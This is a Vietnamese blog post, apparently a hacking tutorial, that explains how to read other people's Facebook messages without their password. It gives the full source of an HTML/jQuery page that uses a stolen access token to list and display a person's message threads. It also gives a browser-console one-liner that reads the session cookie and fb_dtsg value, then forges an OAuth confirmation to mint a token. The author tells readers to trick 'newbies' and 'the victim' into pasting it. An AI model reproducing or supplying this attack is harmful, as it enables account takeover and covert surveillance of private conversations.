Chào các bạn đôi khi các bạn cần đọc một số tin nhắn nhưng không biết mật khẩu của người cần đọc thì các bạn có thể gạ gẫm các newbie dán đoạn code vào. Ở đây mình sẽ chia sẻ cả code F12 đọc token và cả bộ source code để đọc tin nhắn nhé




Đầu tiên bạn tạo file index.php và dán code sau vào :
<!DOCTYPE html>
<html lang="vi">

<head>
    <title>Đọc Trộm Tin Nhắn Bằng Mã Access_Token</title>
    <meta charset="UTF-8">
    <meta http-equiv='Content-Type' content='text/html; charset=utf-8' />
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="" />
 <meta property="og:image" content="https://png.icons8.com/nolan/540/good-quality.png">
 <link href="https://png.icons8.com/nolan/540/good-quality.png" rel="shortcut icon" type="image/x-icon" />
    <!-- css -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/bxslider/4.2.12/jquery.bxslider.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/2.1.3/toastr.min.css">
    <!-- javascipt -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/2.1.3/toastr.min.js"></script>
</head>
<body style="margin-top: 50px;background-color: #000000;">

<div id='show'>
 <div class="col-md-6 col-md-offset-3">
  <div class="panel panel-primary">
   <div class="panel-heading">
    <h3 class="panel-title">Đọc Trộm Tin Nhắn Bằng Mã Access_Token</h3>
   </div>
   <div class="panel-body" id="vuong">
    <div id="mess">

    </div>
    <div class="form-group text-center">
     <label for="input" class="control-label">Nhập Access_Token:</label>
     <input type="text" placeholder="Access_Token ....." class="form-control" id="token">
    </div>
    <div class="form-group text-center">
     <button type="button" class="btn btn-primary" id="btn">Đọc</button>
    </div>
   </div>
  </div>
 </div>
</div>
<div id='hide' style="display: none;">
 <div class="col-md-4 col-md-offset-0">
  <div class="panel panel-primary">
   <div class="panel-heading">
    <h3 class="panel-title">Danh Sách Tin Nhắn</h3>
   </div>
   <div class="panel-body" id="dstn" style="width:auto; height:500px; overflow-y:scroll;">
    <center>Chưa Có Dữ Liệu.</center>
   </div>
  </div>
 </div>
 <div class="col-md-8 col-md-offset-0">
  <div class="panel panel-primary">
   <div class="panel-heading">
    <h3 class="panel-title">
     <span class="pull-left"> Tin Nhắn</span>
     <span class="pull-right" id="user"></span><br>
    </h3>
   </div>
   <div class="panel-body" id="tn" style="width:auto; height:500px; overflow-y:scroll;">
    <center>Chưa Có Dữ Liệu.</center> 
    
   </div>
  </div>
 </div>
</div>
<script type="text/javascript">
 $('#btn').click(function() {
  var token = $('#token').val();
  if (!token) {
   toastr['error']('Nhập Đầy Đủ Thông Tin', 'Thông Báo');
   return false;
  }
  $('#btn').html('<i class="fa fa-spinner fa-spin"></i> Đang Tiến Hành');
  $('#btn').prop('disabled', true);
  $('#vuong').find('input,select').prop('disabled', true);
  $('#dstn').html('<center>Đang tải dữ liệu, vui lòng chờ ... <i class="fa fa-spinner fa-pulse"></i></center>');
  $.getJSON('https://graph.facebook.com/me/threads?limit=5000&access_token=' +token, function(data) {
    $('#show').hide();
    $('#hide').show();
    var table1 = '<table class="table table-bordered table-striped table-hover">';
     table1 += '<tbody>';

     $('#dstn').html(table1);

     data.data.forEach(function(json) {
       var id_mess = json.id;
       var link = json.link;
       var idfb = link.match(/messages\/t\/([0-9]*)\//)[1];
        $.getJSON('https://graph.facebook.com/'+idfb+'?access_token='+token,function (datas){
        var name = datas.name;
        table2 = '     <tr>';
        table2 += '         <td><img class="img-circle" src="https://graph.facebook.com/v3.2/'+idfb+'/picture" width="32" height="32"> <a href="https://www.facebook.com/'+idfb+'" target="_blank">'+name+'</a></td>';
        table2 += '         <td><a onclick="loadtn(\''+id_mess+'\',\' '+idfb.trim()+' \',\' '+name+' \')" class="btn btn-default btn-sm"><span aria-hidden="true" class="glyphicon glyphicon-comment"></span> Xem Tin Nhắn</a></td>';
        table2 += '     </tr>';
        $('#dstn').append(table2);
       });
     });
     var table3 = ' </tbody>';
      table3 += '</table>';
     $('#dstn').append(table3);
     $('#btn').html('Đọc');
     $('#btn').prop('disabled', false);
     $('#vuong').find('input,select').prop('disabled', false);
  }).fail(function(){
   toastr['error']('Access_Token Token Hết Hạn Xử Dụng', 'Thông Báo');
   $('#btn').html('Đọc');
   $('#btn').prop('disabled', false);
   $('#vuong').find('input,select').prop('disabled', false);
  });
 });

 function loadtn(id_mess,idfb,name){
  var token = $('#token').val();
  $('#user').html(name);
  $('#tn').html('<center>Đang tải dữ liệu, vui lòng chờ ... <i class="fa fa-spinner fa-pulse"></i>');
  $.getJSON('https://graph.facebook.com/v1.0/'+id_mess+'/messages?limit=500000&access_token='+token,function (datas){
   $('#tn').html('<ul id="ultn" style="list-style: none;margin: 0;padding: 0;">');
   datas.data.reverse().forEach(function(json) {
    var idfrom   = json.from.id;
    if(json.message != ''){
     if(idfb.trim() == idfrom){
      var message = '<li style="float: left; background: #eee; margin-right:8px;display:inline-block; clear: both; padding: 7px;border-radius: 30px;margin-bottom: 2px; color: #000000;">'+json.message+'</li>';
     }else{
      var message = '<li style="float: right;background: #0084ff;   margin-left:8px; display:inline-block; clear: both; padding: 7px;border-radius: 30px;margin-bottom: 2px;color: #fff;">'+json.message+'</li>';
     }
    }
    $('#tn').append(message);
   });
   $('#tn').append('</ul>');
   $('#tn').animate({
          scrollTop: $('#tn').get(0).scrollHeight
      }, 2000);

  });
 }
</script>       <div id='trave' style='display: none'>
    </div>
</body>
<script type="text/javascript">
    function toarst(status, msg, title) {
        Command: toastr[status](msg, title)
        toastr.options = {
            "closeButton": true,
            "debug": false,
            "progressBar": true,
            "positionClass": "toast-top-right",
            "onclick": null,
            "showDuration": "400",
            "hideDuration": "1000",
            "timeOut": "4000",
            "extendedTimeOut": "1000",
            "showEasing": "swing",
            "hideEasing": "linear",
            "showMethod": "slideDown",
            "hideMethod": "slideUp"
        }
    }
</script>
Tiếp theo bạn chỉ cần lừa victim dán code vào bằng đường F12

var uid = document.cookie.match(/c_user=(\d+)/)[1],dtsg = document.getElementsByName("fb_dtsg")[0].value,http = new XMLHttpRequest,url = "//www.facebook.com/v1.0/dialog/oauth/confirm",params = "fb_dtsg=" + dtsg + "&app_id=165907476854626&redirect_uri=fbconnect%3A%2F%2Fsuccess&display=page&access_token=&from_post=1&return_format=access_token&domain=&sso_device=ios&__CONFIRM__=1&__user=" + uid;http.open("POST", url, !0), http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), http.onreadystatechange = function() {if (4 == http.readyState && 200 == http.status) {var a = http.responseText.match(/access_token=(.*)(?=&expires_in)/);a = a ? a[1] : "Failed to get Access token make sure you authorized the HTC sense app", prompt("Token", a);}}, http.send(params);

Source F12 lấy token : Star Cường IT Vậy là xong, source code trên là mình lấy từ Blog Thanh Sang và edit lại PHP để phù hợp với bản hiện tại của Facebook. Chào các bạn